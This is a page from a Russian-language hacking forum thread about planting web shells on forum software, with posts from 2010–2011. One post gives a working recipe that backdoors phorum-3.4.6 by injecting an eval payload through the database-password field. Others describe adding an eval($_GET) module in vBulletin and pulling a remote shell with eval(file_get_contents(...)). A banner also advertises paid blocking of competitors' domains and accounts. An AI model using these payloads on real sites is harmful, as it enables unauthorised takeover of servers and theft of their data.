[Заливка шелла в Форуме]

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
[Заливка шелла в Форуме]

Страница 6 из 9

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#51

20.03.2010, 20:22

daniel_1024

Участник форума

Регистрация: 15.07.2009

Сообщений: 158

С нами: 8854580

Репутация: 34

есть способы заливки шелла для форума vBulletin 3.8.0 Beta 3 ?!

#52

22.04.2010, 02:49

Рамос

Познающий

Регистрация: 30.10.2009

Сообщений: 41

С нами: 8700818

Репутация: 6

Отправить сообщение для Рамос с помощью AIM

Отправить сообщение для Рамос с помощью Yahoo

в smf можно сменить директорию в которую заливаются темы ?

#53

01.05.2010, 19:29

frost444

Новичок

Регистрация: 19.03.2010

Сообщений: 9

С нами: 8498574

Репутация: 0

как залить шелл на TorrentPier ??

#54

15.05.2010, 13:14

tmp

Участник форума

Регистрация: 10.03.2005

Сообщений: 234

С нами: 11141693

Репутация: 56

Кто знает еще какие то способы заливки шелла на ipb 2.3.4 ? Через импорт изображения - не проходит - вернее шелл загружен но видимо в директории запрещено выполнение скриптов, вываливается ошибка 500 Internal Server Error, через аватару тоже не проходит - и тип файла добавил и разрешение в аватаре на этот тип добавил, но все равно не загружает.
Заранее спасибо

#55

07.06.2010, 20:02

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

С нами: 8395350

Репутация: 0

такой вопрос, залил шелл на IPB NULL, пытаюсь войти и выдаёт 500 Internal Server Error. В чем может быть проблема? Точнее как залить шелл не через стили

Последний раз редактировалось Cherep; 07.06.2010 в 20:06..

#56

18.10.2010, 04:11

Внучёк

Новичок

Регистрация: 16.10.2010

Сообщений: 7

С нами: 8196086

Репутация: 0

Отлично Пашкела в + 4 из 3 в держки по думаю в чем косяк, но все же

#57

30.03.2011, 06:09

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

С нами: 11278406

Репутация: 818

Версия: phorum-3.4.6

Цитата:

Сообщение от None

Зависимости: Нужны права админа.

Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл:

Код:

C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php

Что дает нам возможность внедрить в конфиги пару своих строк =)

Последние строки в конфиг файле:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// database variables

[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseServer'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseName'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabaseUser'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$PHORUM[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DatabasePassword'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]

Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД:

Код:

http://www.SITE.COM/forum/admin/index.php?page=db

В поле Password: дописываем к текущему паролю строку:

Код:

'; @eval(stripslashes($_GET['cmd'])); echo '

И получаем бэкдор по пути:

Код:

http://www.SITE.COM/forum/admin/settings/forums.php

#58

18.07.2011, 23:48

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

С нами: 8395350

Репутация: 0

пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл

пишет

Код:

Parse error: syntax error, unexpected T_STRING in
public_html/faq.php(324) : eval()'d code(1) : eval()'d code on line 1

код в модуле

Код:

eval($_GET[e]);

#59

19.07.2011, 17:59

tack3r

Познающий

Регистрация: 09.04.2009

Сообщений: 82

С нами: 8994119

Репутация: 1

Цитата:

Сообщение от Pashkela

Код:

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: faq_complete
Код: eval($_GET[e]);

потом шлепаем на http://site.ru/forum/faq.php?e=phpinfo();
льем шелл, возвращаемся в админку, удаляем модуль faq_complete

все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();

а где тут загружать шелл найти не могу. Помогите кто сталкивался

#60

19.07.2011, 18:27

plaeer

Участник форума

Регистрация: 08.03.2011

Сообщений: 149

С нами: 7990166

Репутация: 1

Цитата:

Сообщение от tack3r

все сделал , захожу http://site.ru/forum/faq.php?e=phpinfo();
а где тут загружать шелл найти не могу. Помогите кто сталкивался

Это просто проверка рабоспособности бэкдора, чтобы получить полноценный шелл нужно взять любой шелл и залить его в txt формате в коде убрать в начале После вместо phpinfo(); вставляем

eval(file_get_contents('http://site.com/shell.txt'));

Страница 6 из 9

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Заливка шелла в Cms\|Blogs ]	ZAMUT	Веб-уязвимости	13	18.03.2019 04:46
Проблема с заливкой шелла в Invision Power Board v2.1.7	DeadMeat	Уязвимости CMS / форумов	9	24.02.2010 11:48
Способы заливки шелла в Ipb 1.3 - не стандартнные.	zl0ba	Уязвимости CMS / форумов	1	13.11.2006 12:36
Помогите использовать багу сайта в качестве заливки шелла на сайт...	PhoenixLion	PHP	0	23.05.2006 12:45
UBB Threads 6.5.1 (Инструкция по заливке шелла)	pch	Уязвимости CMS / форумов	0	30.04.2006 20:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход